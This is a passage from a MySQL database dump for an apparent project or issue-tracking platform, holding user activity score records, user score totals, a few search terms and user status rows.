08:13:10'),(217,66,NULL,'collaboration','change_issue_status',66,2,3,1,NULL,95,'Issue','2019-11-11 08:13:10','2019-11-11 08:13:10'),(218,66,NULL,'active','update_issue_ratio',66,20,22,1,NULL,94,'Issue','2019-11-11 08:13:21','2019-11-11 08:13:21'),(219,66,NULL,'collaboration','change_issue_status',66,3,4,1,NULL,94,'Issue','2019-11-11 08:13:21','2019-11-11 08:13:21'),(220,66,NULL,'active','update_issue_ratio',66,22,24,1,NULL,93,'Issue','2019-11-11 08:13:41','2019-11-11 08:13:41'),(221,66,NULL,'collaboration','change_issue_status',66,4,5,1,NULL,93,'Issue','2019-11-11 08:13:41','2019-11-11 08:13:41'),(222,46,NULL,'active','post_issue',46,56,60,3,NULL,97,'Issue','2019-11-11 09:59:56','2019-11-11 09:59:56'),(223,49,46,'collaboration','post_issue_message',49,6,7,3,3,124,'Journal','2019-11-11 10:00:12','2019-11-11 10:00:12'),(224,46,NULL,'active','post_issue',46,60,64,3,NULL,98,'Issue','2019-11-11 10:28:02','2019-11-11 10:28:02'),(225,66,NULL,'active','post_issue',66,24,28,3,NULL,99,'Issue','2019-11-11 10:29:15','2019-11-11 10:29:15'),(226,64,NULL,'active','post_issue',64,42,46,1,NULL,100,'Issue','2019-11-11 10:33:16','2019-11-11 10:33:16'),(227,64,NULL,'active','post_issue',64,46,50,1,NULL,101,'Issue','2019-11-11 10:35:21','2019-11-11 10:35:21'),(228,64,NULL,'active','update_issue_ratio',64,50,52,3,NULL,101,'Issue','2019-11-11 12:34:34','2019-11-11 12:34:34'),(229,64,NULL,'collaboration','change_issue_status',64,3,4,3,NULL,101,'Issue','2019-11-11 12:34:34','2019-11-11 12:34:34'),(230,64,NULL,'active','update_issue_ratio',64,52,54,3,NULL,100,'Issue','2019-11-11 14:26:35','2019-11-11 14:26:35'),(231,64,NULL,'collaboration','change_issue_status',64,4,5,3,NULL,100,'Issue','2019-11-11 14:26:35','2019-11-11 14:26:35'),(232,66,NULL,'active','update_issue_ratio',66,28,30,3,NULL,99,'Issue','2019-11-11 14:26:45','2019-11-11 14:26:45'),(233,66,NULL,'collaboration','change_issue_status',66,5,6,3,NULL,99,'Issue','2019-11-11 14:26:45','2019-11-11 14:26:45'),(234,46,NULL,'active','update_issue_ratio',46,64,66,3,NULL,98,'Issue','2019-11-11 14:26:53','2019-11-11 14:26:53'),(235,46,NULL,'collaboration','change_issue_status',46,12,13,3,NULL,98,'Issue','2019-11-11 14:26:53','2019-11-11 14:26:53'),(236,64,NULL,'active','post_issue',64,54,58,3,NULL,102,'Issue','2019-11-11 17:13:17','2019-11-11 17:13:17'),(237,49,64,'collaboration','post_issue_message',49,7,8,3,3,129,'Journal','2019-11-11 17:13:34','2019-11-11 17:13:34'),(238,49,NULL,'active','post_issue',49,28,32,3,NULL,103,'Issue','2019-11-12 09:05:56','2019-11-12 09:05:56'),(239,49,NULL,'active','post_issue',49,32,36,3,NULL,104,'Issue','2019-11-12 09:18:38','2019-11-12 09:18:38'),(240,49,NULL,'active','post_issue',49,36,40,3,NULL,105,'Issue','2019-11-12 10:16:03','2019-11-12 10:16:03'),(241,46,NULL,'active','post_issue',46,66,70,3,NULL,106,'Issue','2019-11-21 17:25:18','2019-11-21 17:25:18'),(242,46,NULL,'active','post_issue',46,70,74,3,NULL,107,'Issue','2019-11-22 09:15:31','2019-11-22 09:15:31'),(243,46,64,'collaboration','post_issue_message',46,13,14,3,3,131,'Journal','2019-11-22 09:24:00','2019-11-22 09:24:00'),(244,46,NULL,'active','post_issue',46,74,78,3,NULL,108,'Issue','2019-11-22 09:27:07','2019-11-22 09:27:07'),(245,65,NULL,'active','post_issue',65,28,32,3,NULL,109,'Issue','2019-11-22 09:29:45','2019-11-22 09:29:45'),(246,64,NULL,'active','update_issue_ratio',64,58,60,3,NULL,100,'Issue','2019-11-22 10:01:49','2019-11-22 10:01:49'),(247,64,NULL,'collaboration','change_issue_status',64,5,6,3,NULL,100,'Issue','2019-11-22 10:01:49','2019-11-22 10:01:49'),(248,46,NULL,'active','post_issue',46,78,82,3,NULL,110,'Issue','2019-11-22 10:30:35','2019-11-22 10:30:35'),(249,76,75,'influence','followed_by',75,0,2,3,3,29,'Watcher','2020-02-01 22:36:19','2020-02-01 22:36:19'),(250,76,NULL,'active','post_issue',76,0,4,3,NULL,111,'Issue','2020-02-04 22:00:33','2020-02-04 22:00:33'),(251,79,75,'influence','followed_by',75,2,4,3,3,33,'Watcher','2020-02-04 22:26:14','2020-02-04 22:26:14'),(252,76,79,'influence','followed_by',79,0,2,3,3,34,'Watcher','2020-02-04 22:48:24','2020-02-04 22:48:24'),(253,79,80,'influence','followed_by',80,0,2,3,1,35,'Watcher','2020-02-04 22:51:34','2020-02-04 22:51:34'),(254,79,76,'influence','followed_by',76,0,2,3,3,36,'Watcher','2020-02-04 22:57:04','2020-02-04 22:57:04'),(255,81,NULL,'active','post_issue',81,0,4,3,NULL,112,'Issue','2020-02-11 09:54:10','2020-02-11 09:54:10'),(256,81,NULL,'active','post_issue',81,4,8,3,NULL,113,'Issue','2020-02-11 10:04:09','2020-02-11 10:04:09'),(257,81,NULL,'active','post_issue',81,8,12,3,NULL,114,'Issue','2020-02-11 10:05:52','2020-02-11 10:05:52'),(258,81,NULL,'active','post_issue',81,12,16,3,NULL,115,'Issue','2020-02-11 10:07:24','2020-02-11 10:07:24'),(259,81,NULL,'active','post_issue',81,16,20,3,NULL,116,'Issue','2020-02-11 10:10:24','2020-02-11 10:10:24'),(260,81,NULL,'active','post_issue',81,20,24,3,NULL,117,'Issue','2020-02-11 10:11:35','2020-02-11 10:11:35'),(261,81,NULL,'active','post_issue',81,24,28,3,NULL,118,'Issue','2020-02-11 10:12:28','2020-02-11 10:12:28'),(262,81,NULL,'active','post_issue',81,28,32,3,NULL,119,'Issue','2020-02-11 10:14:14','2020-02-11 10:14:14'),(263,81,NULL,'active','post_issue',81,32,36,3,NULL,120,'Issue','2020-02-11 10:15:28','2020-02-11 10:15:28'),(264,81,NULL,'active','post_issue',81,36,40,3,NULL,121,'Issue','2020-02-11 10:19:27','2020-02-11 10:19:27'),(265,81,NULL,'active','post_issue',81,40,44,3,NULL,122,'Issue','2020-02-11 10:19:58','2020-02-11 10:19:58'),(266,81,NULL,'active','post_issue',81,44,48,3,NULL,123,'Issue','2020-02-11 10:22:01','2020-02-11 10:22:01'),(267,81,NULL,'active','post_issue',81,48,52,3,NULL,124,'Issue','2020-02-11 10:22:04','2020-02-11 10:22:04'),(268,81,NULL,'active','post_issue',81,52,56,3,NULL,125,'Issue','2020-02-11 10:22:56','2020-02-11 10:22:56'),(269,81,NULL,'active','post_issue',81,56,60,3,NULL,126,'Issue','2020-02-11 10:23:32','2020-02-11 10:23:32'),(270,81,NULL,'active','post_issue',81,60,64,3,NULL,127,'Issue','2020-02-11 10:24:14','2020-02-11 10:24:14'),(271,81,NULL,'active','post_issue',81,64,68,3,NULL,128,'Issue','2020-02-11 10:24:55','2020-02-11 10:24:55'),(272,81,NULL,'active','post_issue',81,68,72,3,NULL,129,'Issue','2020-02-11 10:25:44','2020-02-11 10:25:44'),(273,81,NULL,'active','post_issue',81,72,76,3,NULL,130,'Issue','2020-02-11 10:26:30','2020-02-11 10:26:30'),(274,81,NULL,'active','post_issue',81,76,80,3,NULL,131,'Issue','2020-02-11 10:27:27','2020-02-11 10:27:27'),(275,86,81,'collaboration','post_issue_message',86,0,1,3,3,139,'Journal','2020-02-11 10:42:16','2020-02-11 10:42:16'),(276,89,81,'collaboration','post_issue_message',89,0,1,3,3,140,'Journal','2020-02-11 11:29:44','2020-02-11 11:29:44'),(277,89,81,'collaboration','post_issue_message',89,1,2,3,3,141,'Journal','2020-02-11 11:31:22','2020-02-11 11:31:22'),(278,77,81,'collaboration','post_issue_message',77,0,1,1,3,142,'Journal','2020-02-11 11:33:33','2020-02-11 11:33:33'),(279,99,77,'influence','followed_by',77,0,2,3,1,37,'Watcher','2020-02-11 12:56:21','2020-02-11 12:56:21'),(280,99,NULL,'active','post_issue',99,0,4,3,NULL,132,'Issue','2020-02-11 16:39:25','2020-02-11 16:39:25'),(281,99,NULL,'active','post_issue',99,4,8,3,NULL,133,'Issue','2020-02-11 16:40:27','2020-02-11 16:40:27'),(282,99,NULL,'active','post_issue',99,8,12,3,NULL,134,'Issue','2020-02-11 16:45:53','2020-02-11 16:45:53'),(283,99,NULL,'active','post_issue',99,12,16,3,NULL,135,'Issue','2020-02-11 17:02:48','2020-02-11 17:02:48'),(284,82,77,'influence','followed_by',77,2,4,3,1,38,'Watcher','2020-02-11 17:56:10','2020-02-11 17:56:10'),(285,83,NULL,'active','post_issue',83,0,4,3,NULL,136,'Issue','2020-02-11 19:52:24','2020-02-11 19:52:24'),(286,83,NULL,'active','post_issue',83,4,8,3,NULL,137,'Issue','2020-02-11 19:59:30','2020-02-11 19:59:30'),(287,83,NULL,'active','post_issue',83,8,12,3,NULL,138,'Issue','2020-02-11 20:04:38','2020-02-11 20:04:38'),(288,83,NULL,'active','post_issue',83,12,16,3,NULL,139,'Issue','2020-02-11 20:08:12','2020-02-11 20:08:12'),(289,98,81,'collaboration','post_issue_message',98,0,1,3,3,144,'Journal','2020-02-11 21:01:22','2020-02-11 21:01:22'),(290,81,NULL,'active','update_issue_ratio',81,80,82,3,NULL,129,'Issue','2020-02-24 18:32:31','2020-02-24 18:32:31'),(291,81,NULL,'active','update_issue_ratio',81,82,84,3,NULL,115,'Issue','2020-03-19 14:13:32','2020-03-19 14:13:32'),(292,111,1,'influence','followed_by',1,2,4,1,3,41,'Watcher','2020-07-06 15:47:33','2020-07-06 15:47:33'),(293,111,1,'influence','cancel_followed',1,4,2,1,3,41,'Watcher','2020-07-06 15:47:34','2020-07-06 15:47:34'),(294,111,1,'influence','followed_by',1,2,4,1,3,42,'Watcher','2020-07-06 15:47:35','2020-07-06 15:47:35'),(295,111,1,'influence','cancel_followed',1,4,2,1,3,42,'Watcher','2020-07-06 15:47:36','2020-07-06 15:47:36'),(296,111,1,'influence','followed_by',1,2,4,1,3,43,'Watcher','2020-07-07 20:49:30','2020-07-07 20:49:30'),(297,111,73,'influence','followed_by',73,0,2,1,1,80,'Watcher','2020-08-10 09:47:33','2020-08-10 09:47:33'),(298,111,73,'influence','cancel_followed',73,2,0,1,1,80,'Watcher','2020-08-10 09:47:37','2020-08-10 09:47:37'),(299,111,1,'influence','cancel_followed',1,4,2,1,3,43,'Watcher','2020-08-10 09:48:47','2020-08-10 09:48:47'),(300,111,1,'influence','followed_by',1,2,4,1,3,81,'Watcher','2020-08-10 09:48:49','2020-08-10 09:48:49'),(301,111,1,'influence','cancel_followed',1,4,2,1,3,81,'Watcher','2020-08-10 09:51:19','2020-08-10 09:51:19'),(302,111,1,'influence','followed_by',1,2,4,1,3,82,'Watcher','2020-08-10 09:51:20','2020-08-10 09:51:20'),(303,111,1,'influence','cancel_followed',1,4,2,1,3,82,'Watcher','2020-08-10 09:51:35','2020-08-10 09:51:35'),(304,111,1,'influence','followed_by',1,2,4,1,3,83,'Watcher','2020-08-10 10:01:25','2020-08-10 10:01:25'),(305,111,1,'influence','cancel_followed',1,4,2,1,3,83,'Watcher','2020-08-10 10:01:29','2020-08-10 10:01:29'),(306,111,1,'influence','followed_by',1,2,4,1,3,84,'Watcher','2020-08-10 10:01:30','2020-08-10 10:01:30'),(307,111,1,'influence','cancel_followed',1,4,2,1,3,84,'Watcher','2020-08-10 10:01:32','2020-08-10 10:01:32'),(308,111,1,'influence','followed_by',1,2,4,1,3,85,'Watcher','2020-08-10 10:01:35','2020-08-10 10:01:35'),(309,111,1,'influence','cancel_followed',1,4,2,1,3,85,'Watcher','2020-08-10 10:59:35','2020-08-10 10:59:35'),(310,111,1,'influence','followed_by',1,2,4,1,3,86,'Watcher','2020-08-10 10:59:36','2020-08-10 10:59:36'),(311,111,1,'influence','cancel_followed',1,4,2,1,3,86,'Watcher','2020-08-10 14:30:43','2020-08-10 14:30:43'),(312,111,1,'influence','followed_by',1,2,4,1,3,87,'Watcher','2020-08-10 14:30:47','2020-08-10 14:30:47'),(313,111,1,'influence','cancel_followed',1,4,2,1,3,87,'Watcher','2020-08-10 14:30:50','2020-08-10 14:30:50'),(314,111,1,'influence','followed_by',1,2,4,1,3,88,'Watcher','2020-08-10 14:33:02','2020-08-10 14:33:02'),(315,111,1,'influence','cancel_followed',1,4,2,1,3,88,'Watcher','2020-08-10 14:33:04','2020-08-10 14:33:04'),(316,111,1,'influence','followed_by',1,2,4,1,3,89,'Watcher','2020-08-10 14:33:05','2020-08-10 14:33:05'),(317,111,1,'influence','cancel_followed',1,4,2,1,3,89,'Watcher','2020-08-10 14:39:45','2020-08-10 14:39:45'),(318,1,66,'influence','followed_by',66,0,2,3,3,90,'Watcher','2020-08-10 14:40:43','2020-08-10 14:40:43'),(319,111,46,'influence','followed_by',46,0,2,1,3,91,'Watcher','2020-08-10 14:59:21','2020-08-10 14:59:21'),(320,111,46,'influence','cancel_followed',46,2,0,1,3,91,'Watcher','2020-08-10 14:59:23','2020-08-10 14:59:23'),(321,111,49,'influence','followed_by',49,0,2,1,3,92,'Watcher','2020-08-10 16:45:50','2020-08-10 16:45:50'),(322,111,49,'influence','cancel_followed',49,2,0,1,3,92,'Watcher','2020-08-10 16:45:52','2020-08-10 16:45:52'),(323,111,49,'influence','followed_by',49,0,2,1,3,93,'Watcher','2020-08-10 17:35:53','2020-08-10 17:35:53'),(324,111,49,'influence','cancel_followed',49,2,0,1,3,93,'Watcher','2020-08-10 17:35:54','2020-08-10 17:35:54'),(325,111,49,'influence','followed_by',49,0,2,1,3,94,'Watcher','2020-08-10 17:36:13','2020-08-10 17:36:13'),(326,111,46,'influence','followed_by',46,0,2,1,3,95,'Watcher','2020-08-10 17:44:51','2020-08-10 17:44:51'),(327,111,46,'influence','cancel_followed',46,2,0,1,3,95,'Watcher','2020-08-10 17:44:52','2020-08-10 17:44:52'),(328,111,46,'influence','followed_by',46,0,2,1,3,96,'Watcher','2020-08-10 17:44:53','2020-08-10 17:44:53'),(329,111,46,'influence','cancel_followed',46,2,0,1,3,96,'Watcher','2020-08-10 17:44:53','2020-08-10 17:44:53'),(330,111,46,'influence','followed_by',46,0,2,1,3,97,'Watcher','2020-08-10 17:45:02','2020-08-10 17:45:02'),(331,111,46,'influence','cancel_followed',46,2,0,1,3,97,'Watcher','2020-08-10 17:45:06','2020-08-10 17:45:06'),(332,111,46,'influence','followed_by',46,0,2,1,3,98,'Watcher','2020-08-10 17:45:07','2020-08-10 17:45:07'),(333,111,46,'influence','cancel_followed',46,2,0,1,3,98,'Watcher','2020-08-10 17:45:10','2020-08-10 17:45:10'),(334,111,46,'influence','followed_by',46,0,2,1,3,99,'Watcher','2020-08-10 17:45:15','2020-08-10 17:45:15'),(335,111,46,'influence','cancel_followed',46,2,0,1,3,99,'Watcher','2020-08-10 17:47:33','2020-08-10 17:47:33'),(336,111,46,'influence','followed_by',46,0,2,1,3,100,'Watcher','2020-08-10 17:47:34','2020-08-10 17:47:34'),(337,111,46,'influence','cancel_followed',46,2,0,1,3,100,'Watcher','2020-08-10 17:49:37','2020-08-10 17:49:37'),(338,111,46,'influence','followed_by',46,0,2,1,3,101,'Watcher','2020-08-10 17:49:38','2020-08-10 17:49:38'),(339,111,49,'influence','cancel_followed',49,2,0,1,3,94,'Watcher','2020-08-10 18:04:15','2020-08-10 18:04:15'),(340,111,49,'influence','followed_by',49,0,2,1,3,102,'Watcher','2020-08-10 18:04:16','2020-08-10 18:04:16'),(341,111,49,'influence','cancel_followed',49,2,0,1,3,102,'Watcher','2020-08-10 18:04:17','2020-08-10 18:04:17'),(342,111,49,'influence','followed_by',49,0,2,1,3,103,'Watcher','2020-08-10 18:04:18','2020-08-10 18:04:18'),(343,111,49,'influence','cancel_followed',49,2,0,1,3,103,'Watcher','2020-08-10 18:04:22','2020-08-10 18:04:22'),(344,111,49,'influence','followed_by',49,0,2,1,3,104,'Watcher','2020-08-10 18:04:27','2020-08-10 18:04:27'),(345,111,49,'influence','cancel_followed',49,2,0,1,3,104,'Watcher','2020-08-10 18:04:28','2020-08-10 18:04:28'),(346,111,49,'influence','followed_by',49,0,2,1,3,105,'Watcher','2020-08-10 18:04:29','2020-08-10 18:04:29'),(347,111,49,'influence','cancel_followed',49,2,0,1,3,105,'Watcher','2020-08-10 18:04:30','2020-08-10 18:04:30'),(348,111,49,'influence','followed_by',49,0,2,1,3,106,'Watcher','2020-08-10 18:04:33','2020-08-10 18:04:33'),(349,111,49,'influence','cancel_followed',49,2,0,1,3,106,'Watcher','2020-08-10 18:04:33','2020-08-10 18:04:33'),(350,111,49,'influence','followed_by',49,0,2,1,3,107,'Watcher','2020-08-10 18:04:34','2020-08-10 18:04:34'),(351,111,49,'influence','cancel_followed',49,2,0,1,3,107,'Watcher','2020-08-10 18:04:34','2020-08-10 18:04:34'),(352,111,49,'influence','followed_by',49,0,2,1,3,108,'Watcher','2020-08-10 18:04:40','2020-08-10 18:04:40'),(353,111,49,'influence','cancel_followed',49,2,0,1,3,108,'Watcher','2020-08-10 18:04:40','2020-08-10 18:04:40'),(354,111,49,'influence','followed_by',49,0,2,1,3,109,'Watcher','2020-08-10 18:04:41','2020-08-10 18:04:41'),(355,111,49,'influence','cancel_followed',49,2,0,1,3,109,'Watcher','2020-08-10 18:04:42','2020-08-10 18:04:42'),(356,1,46,'influence','followed_by',46,2,4,3,3,110,'Watcher','2020-08-10 18:38:55','2020-08-10 18:38:55'),(357,1,46,'influence','cancel_followed',46,4,2,3,3,110,'Watcher','2020-08-10 18:38:57','2020-08-10 18:38:57'),(358,111,46,'influence','cancel_followed',46,2,0,1,3,101,'Watcher','2020-08-13 11:31:47','2020-08-13 11:31:47'),(359,111,46,'influence','followed_by',46,0,2,1,3,114,'Watcher','2020-08-13 11:31:48','2020-08-13 11:31:48'),(360,111,46,'influence','cancel_followed',46,2,0,1,3,114,'Watcher','2020-08-13 11:31:50','2020-08-13 11:31:50'),(361,111,46,'influence','followed_by',46,0,2,1,3,115,'Watcher','2020-08-13 11:31:51','2020-08-13 11:31:51'),(362,66,46,'influence','followed_by',46,2,4,3,3,116,'Watcher','2020-08-14 14:56:13','2020-08-14 14:56:13'),(363,66,111,'influence','followed_by',111,0,2,3,1,117,'Watcher','2020-08-14 15:00:47','2020-08-14 15:00:47'),(364,66,111,'influence','cancel_followed',111,2,0,3,1,117,'Watcher','2020-08-14 15:00:50','2020-08-14 15:00:50'),(365,112,1,'influence','followed_by',1,2,4,1,3,124,'Watcher','2020-08-17 16:35:23','2020-08-17 16:35:23'),(366,1,50,'influence','followed_by',50,2,4,3,3,81,'Watcher','2020-08-21 08:44:26','2020-08-21 08:44:26'),(367,1,50,'influence','cancel_followed',50,4,2,3,3,81,'Watcher','2020-08-21 08:44:27','2020-08-21 08:44:27'),(368,47,46,'influence','followed_by',46,4,6,3,3,86,'Watcher','2020-08-25 11:40:14','2020-08-25 11:40:14'),(369,111,50,'influence','followed_by',50,2,4,1,3,87,'Watcher','2020-08-27 15:08:06','2020-08-27 15:08:06'),(370,111,50,'influence','cancel_followed',50,4,2,1,3,87,'Watcher','2020-08-27 15:08:08','2020-08-27 15:08:08'),(371,111,46,'influence','followed_by',46,6,8,1,3,88,'Watcher','2020-09-02 17:46:49','2020-09-02 17:46:49'),(372,111,46,'influence','cancel_followed',46,8,6,1,3,88,'Watcher','2020-09-02 17:46:51','2020-09-02 17:46:51'),(373,1,111,'influence','followed_by',111,0,2,3,1,89,'Watcher','2020-09-16 10:41:21','2020-09-16 10:41:21'),(374,1,46,'influence','followed_by',46,6,8,3,3,90,'Watcher','2020-10-14 17:08:01','2020-10-14 17:08:01'),(375,111,50,'influence','followed_by',50,2,4,1,3,92,'Watcher','2020-10-15 19:16:30','2020-10-15 19:16:30'),(376,111,50,'influence','cancel_followed',50,4,2,1,3,92,'Watcher','2020-10-15 19:16:33','2020-10-15 19:16:33'),(377,111,50,'influence','followed_by',50,2,4,1,3,93,'Watcher','2020-10-15 19:16:35','2020-10-15 19:16:35'),(378,111,50,'influence','cancel_followed',50,4,2,1,3,93,'Watcher','2020-10-15 19:16:38','2020-10-15 19:16:38'),(379,127,1,'influence','followed_by',1,4,6,1,3,94,'Watcher','2020-12-22 19:50:08','2020-12-22 19:50:08');
|
||
/*!40000 ALTER TABLE `user_score_details` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `user_scores`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `user_scores`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `user_scores` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) NOT NULL,
|
||
`collaboration` int(11) DEFAULT NULL,
|
||
`influence` int(11) DEFAULT NULL,
|
||
`skill` int(11) DEFAULT NULL,
|
||
`active` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`level` int(11) DEFAULT NULL,
|
||
`file` int(11) DEFAULT NULL,
|
||
`issue` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=33 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `user_scores`
|
||
--
|
||
|
||
LOCK TABLES `user_scores` WRITE;
|
||
/*!40000 ALTER TABLE `user_scores` DISABLE KEYS */;
|
||
INSERT INTO `user_scores` VALUES (1,1,11,6,NULL,108,'2018-07-11 10:26:14','2020-12-22 19:50:08',NULL,NULL,NULL),(2,5,6,NULL,NULL,52,'2018-07-20 10:17:47','2018-08-10 09:19:23',NULL,NULL,NULL),(3,6,NULL,NULL,NULL,12,'2018-07-20 14:50:29','2018-08-03 18:35:14',NULL,NULL,NULL),(4,19,NULL,NULL,NULL,8,'2019-01-15 15:08:31','2019-01-21 10:17:25',NULL,NULL,NULL),(5,26,9,NULL,NULL,28,'2019-03-05 15:49:52','2019-04-29 13:22:20',NULL,NULL,NULL),(6,43,2,NULL,NULL,4,'2019-04-17 10:07:15','2019-04-17 17:36:14',NULL,NULL,NULL),(7,51,1,NULL,NULL,NULL,'2019-08-07 15:03:10','2019-08-07 15:03:10',NULL,NULL,NULL),(8,46,14,8,NULL,82,'2019-08-08 08:48:02','2020-10-14 17:08:01',NULL,NULL,NULL),(9,49,8,0,NULL,40,'2019-08-08 15:34:53','2020-08-10 18:04:42',NULL,NULL,NULL),(10,50,2,2,NULL,20,'2019-08-13 08:47:54','2020-10-15 19:16:38',NULL,NULL,NULL),(11,53,NULL,2,NULL,NULL,'2019-08-14 10:11:03','2019-08-14 10:11:03',NULL,NULL,NULL),(12,20,1,NULL,NULL,14,'2019-10-08 10:44:52','2019-10-08 13:47:02',NULL,NULL,NULL),(13,61,2,NULL,NULL,10,'2019-10-31 16:54:19','2019-10-31 17:05:53',NULL,NULL,NULL),(15,64,6,NULL,NULL,60,'2019-11-07 16:21:16','2019-11-22 10:01:49',NULL,NULL,NULL),(16,71,1,NULL,NULL,NULL,'2019-11-08 09:11:56','2019-11-08 09:11:56',NULL,NULL,NULL),(17,65,7,NULL,NULL,32,'2019-11-08 10:59:33','2019-11-22 09:29:45',NULL,NULL,NULL),(18,63,3,NULL,NULL,18,'2019-11-08 11:10:36','2019-11-08 14:38:08',NULL,NULL,NULL),(19,66,6,2,NULL,30,'2019-11-10 12:44:07','2020-08-10 14:40:43',NULL,NULL,NULL),(20,75,NULL,4,NULL,NULL,'2020-02-01 22:36:19','2020-02-04 22:26:14',NULL,NULL,NULL),(21,76,NULL,2,NULL,4,'2020-02-04 22:00:33','2020-02-04 22:57:04',NULL,NULL,NULL),(22,79,NULL,2,NULL,NULL,'2020-02-04 22:48:24','2020-02-04 22:48:24',NULL,NULL,NULL),(23,80,NULL,2,NULL,NULL,'2020-02-04 22:51:34','2020-02-04 22:51:34',NULL,NULL,NULL),(24,81,NULL,NULL,NULL,84,'2020-02-11 09:54:10','2020-03-19 14:13:32',NULL,NULL,NULL),(25,86,1,NULL,NULL,NULL,'2020-02-11 10:42:16','2020-02-11 10:42:16',NULL,NULL,NULL),(26,89,2,NULL,NULL,NULL,'2020-02-11 11:29:44','2020-02-11 11:31:22',NULL,NULL,NULL),(27,77,1,4,NULL,NULL,'2020-02-11 11:33:33','2020-02-11 17:56:10',NULL,NULL,NULL),(28,99,NULL,NULL,NULL,16,'2020-02-11 16:39:25','2020-02-11 17:02:48',NULL,NULL,NULL),(29,83,NULL,NULL,NULL,16,'2020-02-11 19:52:24','2020-02-11 20:08:12',NULL,NULL,NULL),(30,98,1,NULL,NULL,NULL,'2020-02-11 21:01:22','2020-02-11 21:01:22',NULL,NULL,NULL),(31,73,NULL,0,NULL,NULL,'2020-08-10 09:47:33','2020-08-10 09:47:37',NULL,NULL,NULL),(32,111,NULL,2,NULL,NULL,'2020-08-14 15:00:47','2020-09-16 10:41:21',NULL,NULL,NULL);
|
||
/*!40000 ALTER TABLE `user_scores` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `user_searches`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `user_searches`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `user_searches` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`search_type` int(11) DEFAULT NULL,
|
||
`subject` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_user_searches_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=12 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `user_searches`
|
||
--
|
||
|
||
LOCK TABLES `user_searches` WRITE;
|
||
/*!40000 ALTER TABLE `user_searches` DISABLE KEYS */;
|
||
INSERT INTO `user_searches` VALUES (1,4,0,'项目','2018-07-10 16:47:55','2018-07-10 16:47:55'),(2,4,0,'尹','2018-07-10 17:13:50','2018-07-10 17:13:50'),(3,1,0,'qwe','2018-07-12 16:31:15','2018-07-12 16:31:15'),(4,1,0,'qw','2018-07-12 17:04:54','2018-07-12 17:04:54'),(5,1,0,'11','2018-07-12 17:29:56','2018-07-12 17:29:56'),(6,1,0,'第一个','2018-07-13 09:44:33','2018-07-13 09:44:33'),(7,1,0,'测试','2018-07-19 08:47:08','2018-07-19 08:47:54'),(8,4,0,'第一','2018-07-19 09:45:57','2018-07-19 09:45:57'),(9,1,0,'阿萨德','2018-07-20 16:28:09','2018-07-20 16:28:09'),(10,5,0,'a','2018-07-23 16:26:33','2018-07-31 17:04:23'),(11,1,0,'啊','2018-08-02 15:46:48','2018-08-02 15:46:48');
|
||
/*!40000 ALTER TABLE `user_searches` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `user_statuses`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `user_statuses`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `user_statuses` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`changesets_count` int(11) DEFAULT NULL,
|
||
`watchers_count` int(11) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`grade` float DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_user_statuses_on_changesets_count` (`changesets_count`),
|
||
KEY `index_user_statuses_on_watchers_count` (`watchers_count`),
|
||
KEY `index_user_statuses_on_grade` (`grade`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=216 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `user_statuses`
|
||
--
|
||
|
||
LOCK TABLES `user_statuses` WRITE;
|
||
/*!40000 ALTER TABLE `user_statuses` DISABLE KEYS */;
|
||
INSERT INTO `user_statuses` VALUES (1,0,0,3,'2018-07-06 10:52:18','2018-07-06 10:52:18',0),(2,0,0,4,'2018-07-08 10:28:20','2018-07-08 10:28:20',0),(3,NULL,2,1,'2018-07-18 17:08:45','2020-07-07 20:49:30',0),(4,NULL,0,5,'2018-07-20 09:16:41','2018-07-20 09:16:41',0),(5,NULL,0,6,'2018-07-20 14:47:43','2018-07-20 14:47:43',0),(6,NULL,0,7,'2018-07-30 09:39:16','2018-07-30 09:39:16',0),(7,NULL,0,8,'2018-08-03 19:28:18','2018-08-03 19:28:18',0),(8,NULL,0,9,'2018-08-06 15:18:46','2018-08-06 15:18:46',0),(9,NULL,0,10,'2018-08-06 15:24:59','2018-08-06 15:24:59',0),(10,NULL,0,11,'2018-08-21 17:13:35','2018-08-21 17:13:35',0),(11,NULL,0,12,'2018-08-22 15:59:03','2018-08-22 15:59:03',0),(12,NULL,0,13,'2018-08-30 22:28:07','2018-08-30 22:28:07',0),(13,NULL,0,14,'2018-09-05 13:54:44','2018-09-05 13:54:44',0),(14,NULL,0,15,'2018-09-07 12:37:19','2018-09-07 12:37:19',0),(15,NULL,0,16,'2018-10-10 09:29:20','2018-10-10 09:29:20',0),(16,NULL,0,17,'2018-10-12 17:36:42','2018-10-12 